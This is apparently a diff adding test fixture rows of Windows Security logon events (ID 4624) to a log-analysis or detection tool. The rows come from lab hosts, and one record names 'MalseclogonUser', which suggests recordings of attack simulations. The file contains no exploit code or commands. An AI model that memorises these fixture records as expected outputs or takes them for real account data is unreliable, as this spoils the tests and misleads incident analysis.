+    <Data Name=""TargetLogonId"">0x38f87e</Data>
+    <Data Name=""LogonType"">9</Data>
+    <Data Name=""LogonProcessName"">seclogo</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1b90</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">0</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">l</Data>
+    <Data Name=""TargetOutboundDomainName"">o</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-12T17:58:04.842263Z"">
+    </TimeCreated>
+    <EventRecordID>2982101</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3652"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x73b44c</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">E8C9AC4A-31FC-C37F-B4D7-B3217C608858</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64849</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2021-12-12T21:57:52.499428+04:00,1639331872.499428,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-12T17:57:52.497329Z"">
+    </TimeCreated>
+    <EventRecordID>2982097</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""2456"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-101606</Data>
+    <Data Name=""TargetUserName"">lgrove</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x738cf9</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">04246W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.19</Data>
+    <Data Name=""IpPort"">50616</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2021-12-12T21:57:52.375084+04:00,1639331872.375084,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-12T17:57:52.372001Z"">
+    </TimeCreated>
+    <EventRecordID>2982092</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3652"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-101606</Data>
+    <Data Name=""TargetUserName"">lgrove</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x738ce4</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">04246W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.19</Data>
+    <Data Name=""IpPort"">50614</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2021-12-12T21:57:52.366793+04:00,1639331872.366793,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-12T17:57:52.325837Z"">
+    </TimeCreated>
+    <EventRecordID>2982089</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3652"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-101606</Data>
+    <Data Name=""TargetUserName"">lgrove</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x738afd</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">04246W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.19</Data>
+    <Data Name=""IpPort"">50613</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2021-12-12T21:57:52.313673+04:00,1639331872.313673,4624,lgrove,THREEBEESCO.COM,3,Kerberos,172.16.66.19,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-12T17:57:52.278193Z"">
+    </TimeCreated>
+    <EventRecordID>2982084</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3652"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-101606</Data>
+    <Data Name=""TargetUserName"">lgrove</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x738ae4</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">DCED4BA6-CF24-37EF-0627-B0E4EED7F565</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.19</Data>
+    <Data Name=""IpPort"">50609</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.616154Z"">
+    </TimeCreated>
+    <EventRecordID>329918</EventRecordID>
+    <Correlation ActivityID=""B04CB785-EBD3-0000-16B8-4CB0D3EBD701"">
+    </Correlation>
+    <Execution ProcessID=""636"" ThreadID=""7156"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""LogonType"">9</Data>
+    <Data Name=""LogonProcessName"">seclogo</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1bc4</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">0</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">MalseclogonUser</Data>
+    <Data Name=""TargetOutboundDomainName"">MalseclogonDomain</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:42:00.800072Z"">
+    </TimeCreated>
+    <EventRecordID>21373</EventRecordID>
+    <Correlation ActivityID=""AD9FD595-5D0F-0001-C2D5-9FAD0F5DD801"">
+    </Correlation>
+    <Execution ProcessID=""704"" ThreadID=""9984"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-81107902-1099128984-1836738286-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x82215a</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">59CEFB69-4F9D-7486-C449-471E00B814E3</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.1.219</Data>
+    <Data Name=""IpPort"">63652</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:41:54.272334Z"">
+    </TimeCreated>
+    <EventRecordID>21371</EventRecordID>
+    <Correlation ActivityID=""AD9FD595-5D0F-0001-C2D5-9FAD0F5DD801"">
+    </Correlation>
+    <Execution ProcessID=""704"" ThreadID=""740"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-81107902-1099128984-1836738286-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x821f28</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">59CEFB69-4F9D-7486-C449-471E00B814E3</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.1.219</Data>
+    <Data Name=""IpPort"">63652</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:41:47.653255Z"">
+    </TimeCreated>
+    <EventRecordID>21369</EventRecordID>
+    <Correlation ActivityID=""AD9FD595-5D0F-0001-C2D5-9FAD0F5DD801"">
+    </Correlation>
+    <Execution ProcessID=""704"" ThreadID=""740"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-81107902-1099128984-1836738286-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x821aab</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">59CEFB69-4F9D-7486-C449-471E00B814E3</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.1.219</Data>
+    <Data Name=""IpPort"">63652</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:41:37.642369Z"">
+    </TimeCreated>
+    <EventRecordID>21367</EventRecordID>
+    <Correlation ActivityID=""AD9FD595-5D0F-0001-C2D5-9FAD0F5DD801"">
+    </Correlation>
+    <Execution ProcessID=""704"" ThreadID=""10224"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-81107902-1099128984-1836738286-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x820d61</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">59CEFB69-4F9D-7486-C449-471E00B814E3</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.1.219</Data>
+    <Data Name=""IpPort"">63640</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-11-15T12:19:17.134469+04:00,1573805957.134469,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,127.0.0.1,-,alice.insecurebank.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-11-15T08:19:16.102509Z"">
+    </TimeCreated>
+    <EventRecordID>25049</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""516"" ThreadID=""308"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>alice.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x1d12916</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">127.0.0.1</Data>
+    <Data Name=""IpPort"">59336</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-02T11:47:57.263194Z"">
+    </TimeCreated>
+    <EventRecordID>2171296</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""632"" ThreadID=""2504"">
